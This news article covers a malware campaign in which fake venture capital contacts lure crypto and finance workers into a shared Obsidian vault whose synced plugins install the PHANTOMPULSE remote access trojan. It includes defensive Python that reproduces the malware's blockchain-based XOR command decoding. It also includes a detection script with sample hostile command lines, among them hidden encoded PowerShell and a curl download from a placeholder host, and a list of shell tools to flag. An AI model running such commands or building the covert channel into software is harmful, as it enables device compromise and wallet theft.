New Malware Scam Targets Crypto Users in Obsidian App


A newly disclosed malware campaign is targeting crypto and finance professionals by abusing the Obsidian notes app’s community plugin system, according to Elastic Security Labs. The attack does not exploit a software flaw in Obsidian itself. Instead, it uses social engineering on LinkedIn and Telegram, then tricks victims into opening a shared vault and enabling synced plugins that silently launch a remote access trojan called PHANTOMPULSE. That shift matters because it turns a trusted productivity workflow into the initial access point.

Elastic Security Labs published its report, “Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT,” on April 14, 2026. The researchers said the campaign specifically targeted people in crypto and finance and relied on a fake venture capital narrative to build trust before moving victims into Telegram chats and then into Obsidian-hosted content. Cointelegraph separately reported the same day that the operation used “elaborate” social engineering and worked across both Windows and macOS, reinforcing the core findings from Elastic’s primary research.

How the Obsidian malware scam works

The mechanics are unusually clever because the attackers appear to stay inside normal user behavior for as long as possible. Elastic said victims were first approached on LinkedIn by actors posing as a venture capital firm. The conversation then shifted to Telegram, where the attackers discussed cryptocurrency liquidity services to make the outreach look commercially plausible. From there, the target was told to use Obsidian as a shared company knowledge base and was given credentials to access a cloud-hosted vault controlled by the attackers.

That vault was the real trap. Once the victim opened it in Obsidian, the attackers instructed them to enable community plugin sync. According to Elastic, the synced plugins then executed the next stage of the attack chain without requiring the victim to download what looked like traditional malware. In other words, the campaign abused intended functionality rather than a classic exploit. That distinction is important for defenders because many security teams still prioritize vulnerability patching over workflow abuse and trust-based execution paths.

Elastic’s report said the campaign used trojanized plugins and named the malware family PHANTOMPULSE. The malware was described as a previously undocumented remote access trojan designed for stealth, resilience, and broad remote access. Penligent, summarizing the Elastic findings on April 15, 2026, said the malware included capabilities such as screenshots, keylogging, file execution, injection, uninstall routines, and privilege-related actions. Elastic also noted that the attack chain differed somewhat between Windows and macOS, but both paths ended in device compromise.

Why crypto users are being singled out

Crypto users remain a prime target because a compromised machine can expose wallets, seed phrases, exchange sessions, browser cookies, and messaging accounts tied to high-value transactions. Cointelegraph cited Chainalysis data showing that $713 million was stolen through compromises of individual crypto wallets in 2025. That figure gives useful context: attackers do not need to breach an exchange if they can compromise the people moving funds, negotiating deals, or managing treasury operations from their own devices.

What stands out in this campaign is the pretext. Instead of sending a phishing link with obvious red flags, the attackers built a business conversation around venture capital and liquidity services. That is tailored to the crypto sector’s real operating environment, where founders, traders, market makers, and treasury managers often move between LinkedIn, Telegram, shared docs, and note-taking tools. I have tracked crypto-targeted intrusion patterns for years, and that workflow mimicry is what makes this campaign more dangerous than generic wallet-drainer spam. It does not scream “scam” at first glance. It looks like work.

What makes PHANTOMPULSE different

The most unusual technical detail in Elastic’s report is the command-and-control design. The researchers said PHANTOMPULSE used a decentralized mechanism tied to at least three blockchain networks. Elastic described malware logic that parsed transaction input data from blockchain responses, removed the hexadecimal prefix, decoded the bytes, and then XOR-decrypted the result using the wallet address as a key. That means public blockchain data was being used as part of the malware’s control channel.
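The decoding steps Elastic describes (parse the transaction, strip the hex prefix, decode the bytes, XOR with the wallet address) can be reproduced on the analyst side to triage what a suspect transaction carries. The block below is an added example, not code from Elastic's report or from the malware; the JSON-RPC response shape, the use of the "input" field, and the choice of the address's ASCII text as the XOR key are assumptions, and the sample response is constructed.

```python
import json

# Constructed sample, not taken from the report: a JSON-RPC style transaction
# lookup whose "input" field carries an XOR-encoded command (decodes to "screenshot").
WALLET = "0x00112233445566778899aabbccddeeff00112233"  # constructed placeholder address
SAMPLE_RESPONSE = json.dumps({
    "jsonrpc": "2.0", "id": 1,
    "result": {"to": WALLET, "input": "0x431b4255545f415a5c47"},
})


def strip_hex_prefix(value: str) -> str:
    """Drop a leading 0x/0X; the report describes this as the first decoding step."""
    return value[2:] if value[:2].lower() == "0x" else value


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. It is symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_instruction(tx_response: str, wallet_address: str) -> bytes:
    """Parse -> strip prefix -> hex-decode -> XOR with the wallet address.

    Assumption: the key is the ASCII text of the address. The report does not say
    whether the text or the raw 20 address bytes are used; adjust if you know.
    """
    tx = json.loads(tx_response)["result"]
    raw = bytes.fromhex(strip_hex_prefix(tx["input"]))
    return xor_bytes(raw, wallet_address.encode("ascii"))


def decode_instruction_text(tx_response: str, wallet_address: str) -> str:
    """Return printable text, or a hex rendering when the result is not valid UTF-8
    (a wrong key or a binary payload lands here instead of raising)."""
    data = decode_instruction(tx_response, wallet_address)
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return "hex:" + data.hex()


if __name__ == "__main__":
    print(decode_instruction_text(SAMPLE_RESPONSE, WALLET))  # prints "screenshot"
```

Point a real `eth_getTransactionByHash`-style response and the wallet the sample resolves to at `decode_instruction_text` to check whether a transaction's input decodes to something readable.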


That matters for two reasons. First, it can make infrastructure takedowns harder because defenders are not dealing with a single conventional server endpoint. Second, it shows how threat actors are adapting crypto-native infrastructure for operational resilience. Cointelegraph reported the same point, noting that the malware used on-chain transaction data tied to a specific wallet to receive instructions. For security teams in digital assets, this is the bigger story competitors may miss: the campaign is not just targeting crypto users; it is borrowing crypto rails to stay hidden and flexible.

Obsidian is not “hacked,” but the trust model is under pressure

There is no evidence in the Elastic report that Obsidian itself was compromised or that the attackers exploited a vulnerability in the app. The campaign abused the community plugin ecosystem and user trust. That distinction should be made clearly because it changes the response. This is not mainly a patch-now story. It is a governance story around plugin permissions, shared vault hygiene, identity verification, and endpoint controls.


Obsidian’s plugin model has long raised security questions in the community because plugins can execute code. Public discussions in the Obsidian community over the past year have repeatedly warned that third-party plugins should be treated carefully, even when they are open source. Elastic’s findings now give that concern a concrete, high-value attack example. The lesson is simple: if a stranger asks you to install or sync plugins as part of a business conversation, that request should be treated with the same suspicion as a macro-enabled document or an unsigned executable.

How users and firms can reduce the risk

Crypto users should start with process controls. Do not accept unsolicited business workflows that require a new app, a shared vault, or plugin activation. Verify identities outside the original chat thread. If someone claims to represent a fund or market-making desk, confirm that through an official company domain, not only LinkedIn or Telegram. Disable unnecessary community plugins, and do not sync plugins from untrusted vaults.

For firms, endpoint telemetry matters. Elastic said it was able to block the attack, which suggests behavior-based detection can still catch the chain even when the initial steps look legitimate. Security teams should monitor for unusual parent-child process relationships involving Obsidian, shell execution spawned from note-taking software, and outbound traffic patterns that do not fit normal documentation workflows. On the policy side, treasury staff, deal teams, and executives should use hardened devices for wallet operations and high-risk communications.
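The parent-child process check described above, written out as an added example over constructed telemetry (this is not Elastic's detection logic, and the event format, host names and command lines are invented). Obsidian is an Electron app, so Obsidian spawning another Obsidian renderer process is normal and is deliberately not flagged; a shell, script host or download tool as a direct child of Obsidian is.

```python
import json

# Constructed sample telemetry, one JSON object per line, in the shape of a minimal
# EDR process-creation export. None of these hosts, paths or URLs are real.
SAMPLE_EVENTS = """
{"host":"win-treasury-01","os":"windows","parent":"Obsidian.exe","process":"Obsidian.exe","cmdline":"Obsidian.exe --type=renderer"}
{"host":"win-treasury-01","os":"windows","parent":"Obsidian.exe","process":"powershell.exe","cmdline":"powershell.exe -w hidden -enc AAAA"}
{"host":"mac-deals-02","os":"macos","parent":"Obsidian","process":"sh","cmdline":"sh -c 'curl https://placeholder.invalid/x -o /tmp/x'"}
{"host":"mac-deals-02","os":"macos","parent":"Terminal","process":"sh","cmdline":"sh -c ls"}
{"host":"win-treasury-01","os":"windows","parent":"explorer.exe","process":"Obsidian.exe","cmdline":"Obsidian.exe"}
"""

OBSIDIAN_NAMES = {"obsidian.exe", "obsidian"}

# Children that a note-taking app has no routine reason to launch. Extend per
# environment; the lists are a starting point, not an exhaustive catalogue.
SHELL_CHILDREN = {
    "windows": {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"},
    "macos": {"sh", "bash", "zsh", "osascript", "curl", "python3"},
}


def parse_events(text: str) -> list:
    """One JSON document per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_suspicious(event: dict) -> bool:
    """True when Obsidian is the direct parent of a shell/script/download process."""
    parent = event.get("parent", "").lower()
    child = event.get("process", "").lower()
    os_name = event.get("os", "").lower()
    return parent in OBSIDIAN_NAMES and child in SHELL_CHILDREN.get(os_name, set())


def detect(text: str) -> list:
    """Return one alert dict per suspicious event, keeping the fields an analyst needs."""
    alerts = []
    for ev in parse_events(text):
        if is_suspicious(ev):
            alerts.append({"rule": "obsidian_spawns_shell", "host": ev.get("host"),
                           "parent": ev["parent"], "process": ev["process"],
                           "cmdline": ev.get("cmdline", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(json.dumps(alert))
```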

The broader takeaway is uncomfortable but clear. Productivity software is becoming part of the attack surface for crypto. In this case, the attackers did not need a browser exploit or a wallet vulnerability. They needed trust, a believable pretext, and a plugin sync prompt.

Frequently Asked Questions

What is the new Obsidian malware scam?

It is a social engineering campaign disclosed by Elastic Security Labs on April 14, 2026. Attackers pose as a venture capital firm, move targets from LinkedIn to Telegram, then persuade them to open a shared Obsidian vault and enable community plugin sync, which triggers malware execution.

Does this mean Obsidian has a security vulnerability?

No public report says the attackers exploited a software flaw in Obsidian itself. Elastic said the campaign abused legitimate app features, especially the community plugin ecosystem and synced vault workflow, rather than a traditional vulnerability.

Who is being targeted in this campaign?

Elastic said the operation targeted people in crypto and finance. The lure centered on financial services and cryptocurrency liquidity solutions, which made the outreach look relevant to founders, traders, treasury staff, and investment professionals.

What is PHANTOMPULSE?

PHANTOMPULSE is the name Elastic gave to the remote access trojan delivered in the campaign. The malware is described as stealthy and resilient, with capabilities that include remote control, screenshots, keylogging, file execution, and other post-compromise actions.

Why is this especially dangerous for crypto users?

A compromised device can expose exchange sessions, wallet access, browser cookies, and sensitive communications. Chainalysis data cited by Cointelegraph shows $713 million was stolen through individual wallet compromises in 2025, which shows how valuable end-user access remains to attackers.

How can I protect myself?

Do not open shared vaults or enable plugins for unsolicited contacts. Verify business identities through official channels, keep community plugins to a minimum, use endpoint protection, and separate high-value wallet activity from general-purpose work devices whenever possible.

Conclusion

The Obsidian campaign is a reminder that crypto security threats are shifting from obvious phishing pages to workflow-native deception. Elastic’s April 14, 2026 report shows attackers can weaponize trust in collaboration tools without exploiting the app itself. For crypto users, that means security can no longer focus only on wallets and exchanges. The note-taking app, the chat handoff, the shared workspace, and the plugin prompt all matter now. In practical terms, the safest response is to treat any unsolicited productivity setup as a potential intrusion path until proven otherwise.

Written by
Christopher Hernandez

Christopher Hernandez is a seasoned financial journalist with over 5 years of experience specializing in crypto news. He holds a BA in Financial Journalism from a recognized university, equipping him with the skills necessary to analyze and report on the fast-paced world of cryptocurrencies. As a mid-career professional, Christopher has contributed insightful articles to Tbnexpress, covering the latest trends, regulatory developments, and market analysis in the cryptocurrency sector. With a focus on maintaining transparency, Christopher adheres to the highest standards of YMYL (Your Money Your Life) content, ensuring his readers receive reliable and trustworthy information. You can reach him at [email protected] for inquiries or collaborations.
